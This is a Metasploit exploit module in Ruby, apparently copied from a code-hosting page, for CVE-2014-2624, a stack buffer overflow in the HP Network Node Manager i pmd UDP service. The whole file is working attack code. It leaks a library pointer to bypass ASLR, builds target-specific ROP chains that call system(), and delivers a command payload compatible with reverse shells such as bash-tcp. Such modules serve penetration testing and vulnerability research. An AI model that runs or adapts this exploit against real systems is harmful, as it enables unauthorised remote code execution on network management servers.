Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = NormalRanking
8

9
  include Msf::Exploit::Remote::Udp
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'HP Network Node Manager I PMD Buffer Overflow',
14
      'Description'    => %q{
15
        This module exploits a stack buffer overflow in HP Network Node Manager I (NNMi). The
16
        vulnerability exists in the pmd service, due to the insecure usage of functions like
17
        strcpy and strcat while handling stack_option packets with user controlled data. In
18
        order to bypass ASLR this module uses a proto_tbl packet to leak an libov pointer from
19
        the stack and finally build the ROP chain to avoid NX.
20
      },
21
      'Author'         =>
22
        [
23
          'd(-_-)b',     # Vulnerability discovery
24
          'juan vazquez' # Metasploit module
25
        ],
26
      'References'     =>
27
        [
28
          ['CVE', '2014-2624'],
29
          ['ZDI', '14-305']
30
        ],
31
      'Payload'        =>
32
        {
33
          'BadChars'    => "\x00",
34
          'Space'       => 3000,
35
          'DisableNops' => true,
36
          'Compat'      =>
37
            {
38
              'PayloadType' => 'cmd cmd_bash',
39
              'RequiredCmd' => 'generic python perl openssl bash-tcp gawk'
40
            }
41
        },
42
      'Arch'           => ARCH_CMD,
43
      'Platform'       => 'unix',
44
      'Targets'        =>
45
        [
46
          ['Automatic', {}],
47
          ['HP NNMi 9.10 / CentOS 5',
48
            {
49
              # ptr to .rodata with format specifier
50
              #.rodata:0003BE86 aS_1            db '%s',0
51
              'ov_offset'      => 0x3BE86,
52
              :rop             => :rop_hp_nnmi_9_10
53
            }
54
          ],
55
          ['HP NNMi 9.20 / CentOS 6',
56
            {
57
              # ptr to .rodata with format specifier
58
              #.rodata:0003C2D6 aS_1            db '%s',0
59
              'ov_offset'      => 0x3c2d8,
60
              :rop             => :rop_hp_nnmi_9_20
61
            }
62
          ]
63
        ],
64
      'Privileged'     => false, # true for HP NNMi 9.10, false for HP NNMi 9.20
65
      'DisclosureDate' => '2014-09-09',
66
      'DefaultTarget'  => 0
67
      ))
68

69
    register_options([ Opt::RPORT(7426) ])
70
  end
71

72
  def check
73
    header = [
74
      0x2a5,  # pmdmgr_init pkt
75
      0x3cc,  # signature
76
      0xa0c,  # signature
77
      0xca8   # signature
78
    ].pack("V")
79

80
    data = "\x00" * (0xfa4 - header.length)
81

82
    pkt = header + data
83

84
    connect_udp
85
    udp_sock.put(pkt)
86
    res = udp_sock.timed_read(8, 1)
87
    if res.blank?
88
      # To mitigate MacOSX udp sockets behavior
89
      udp_sock.put(pkt)
90
      res = udp_sock.timed_read(8)
91
    end
92
    disconnect_udp
93

94
    if res.blank?
95
      return Exploit::CheckCode::Unknown
96
    elsif res.length == 8 && res.unpack("V").first == 0x2a5
97
      return Exploit::CheckCode::Detected
98
    else
99
      return Exploit::CheckCode::Unknown
100
    end
101
  end
102

103
  def exploit
104
    connect_udp
105
    # info leak with a "proto_tbl" packet
106
    print_status("Sending a 'proto_tbl' request...")
107
    udp_sock.put(proto_tbl_pkt)
108

109
    res = udp_sock.timed_read(13964, 1)
110
    if res.blank?
111
      # To mitigate MacOSX udp sockets behavior
112
      udp_sock.put(proto_tbl_pkt)
113
      res = udp_sock.timed_read(13964)
114
    end
115

116
    if res.blank?
117
      fail_with(Failure::Unknown, "Unable to get a 'proto_tbl' response...")
118
    end
119

120
    if target.name == 'Automatic'
121
      print_status("Fingerprinting target...")
122
      my_target = auto_target(res)
123
      fail_with(Failure::NoTarget, "Unable to autodetect target...") if my_target.nil?
124
    else
125
      my_target = target
126
      fail_with(Failure::Unknown, "Unable to leak libov base address...") unless find_ov_base(my_target, res)
127
    end
128

129
    print_good("Exploiting #{my_target.name} with libov base address at 0x#{@ov_base.to_s(16)}...")
130

131
    # exploit with a "stack_option_pkt" packet
132
    udp_sock.put(stack_option_pkt(my_target, @ov_base))
133

134
    disconnect_udp
135
  end
136

137
  def rop_hp_nnmi_9_10(ov_base)
138
    rop = rand_text_alpha(775)
139
    rop << [0x808d7c1].pack("V")          # pop ebx ; pop ebp ; ret
140
    rop << [ov_base + 0x481A8].pack("V")  # ebx: libov .got
141
    rop << [0x8096540].pack("V")          # ptr to .data where user controlled string will be stored:
142
                                          # "PMD Stack option specified, but stack not available (user_controlled)"
143
    rop << [0x808d7c2].pack("V")          # pop ebp # ret
144
    rop << [0x08096540 + 4732].pack("V")  # ebp: ptr to our controlled data in .data (+0x1028 to compensate)
145
    rop << [ov_base +  0x1D692].pack("V") # ptr to 'call _system' sequence:
146
                                          #.text:0001D692  lea     eax, [ebp+dest]
147
                                          #.text:0001D698  push    eax             ; command
148
                                          #.text:0001D699  call    _system
149
    rop
150
  end
151

152
  def rop_hp_nnmi_9_20(ov_base)
153
    rop = rand_text_alpha(775)
154
    rop << [0x808dd70].pack("V")                      # pop eax ; pop ebx ; pop ebp ; ret
155
    rop << [0xf7f61cd0 + ov_base + 0x1dae6].pack("V") # eax: ptr to 'call _system' sequence
156
                                                      #.text:0001DAE6  lea     eax, [ebp+dest] (dest = -0x1028)
157
                                                      #.text:0001DAEC  push    eax             ; command
158
                                                      #.text:0001DAED  call    _system
159
    rop << [0x08097160].pack("V")                     # ebx: ptr to .data where user controlled string will be stored:
160
                                                      # "PMD Stack option specified, but stack not available (user_controlled)"
161
    rop << rand_text_alpha(4)                         # ebp: padding
162
    rop << [0x804fb86].pack("V")                      # add eax 0x809e330 ; add ecx ecx ; ret (control eax)
163
    rop << [0x8049ac4].pack("V")                      # xchg eax, edi ; ret
164
    rop << [0x808dd70].pack("V")                      # pop eax ; pop ebx ; pop ebp ; ret
165
    rop << [0xf7f61cd0 + ov_base + 0x47f1c].pack("V") # eax: libov .got base
166
    rop << rand_text_alpha(4)                         # ebx: padding
167
    rop << [0x8097160 + 4764].pack("V")               # ebp: ptr to our controlled data in .data (+0x1028 to compensate)
168
    rop << [0x804fb86].pack("V")                      # add eax 0x809e330 ; add ecx ecx ; ret (control eax)
169
    rop << [0x805a58d].pack("V")                      # xchg ebx eax ; and eax 0xc4830001 ; and cl cl ; ret (ebx: libov .got)
170
    rop << [0x8049ac4].pack("V")                      # xchg eax, edi ; ret ; (eax: call to system sequence from libov)
171
    rop << [0x80528BC].pack("V")                      # jmp eax
172

173
    rop
174
  end
175

176
  def stack_option_pkt(t, ov_base)
177
    hdr = [0x2a9].pack("V")             # stack_option packet
178
    data = "-SA"                        # stack name (invalid one 'A')
179
    data << ";"                         # separator
180
    data << self.send(t[:rop], ov_base) # malformed stack options
181
    data << payload.encoded
182
    data << ";\n"
183
    data << "\x00" * (0xfa4 - data.length - hdr.length)
184

185
    hdr + data
186
  end
187

188
  def proto_tbl_pkt
189
    hdr = [0x2aa].pack("V") # proto_tbl packet
190
    data = "\x00" * (0xfa4 - hdr.length)
191

192
    hdr + data
193
  end
194

195
  def base(address, offset)
196
    address - offset
197
  end
198

199
  def find_ov_base(t, data)
200
    print_status("Searching #{t.name} pointers...")
201
    i = 0
202
    data.unpack("V*").each do |int|
203
      if base(int, t['ov_offset']) % 0x1000 == 0
204
        print_status("Pointer 0x#{int.to_s(16)} found at offset #{i * 4}")
205
        @ov_base = base(int, t['ov_offset'])
206
        return true
207
      end
208
      i = i + 1
209
    end
210

211
    false
212
  end
213

214
  def auto_target(data)
215
    targets.each do |t|
216
      next if t.name == 'Automatic'
217
      if find_ov_base(t, data)
218
        return t
219
      end
220
    end
221

222
    nil
223
  end
224
end
225

226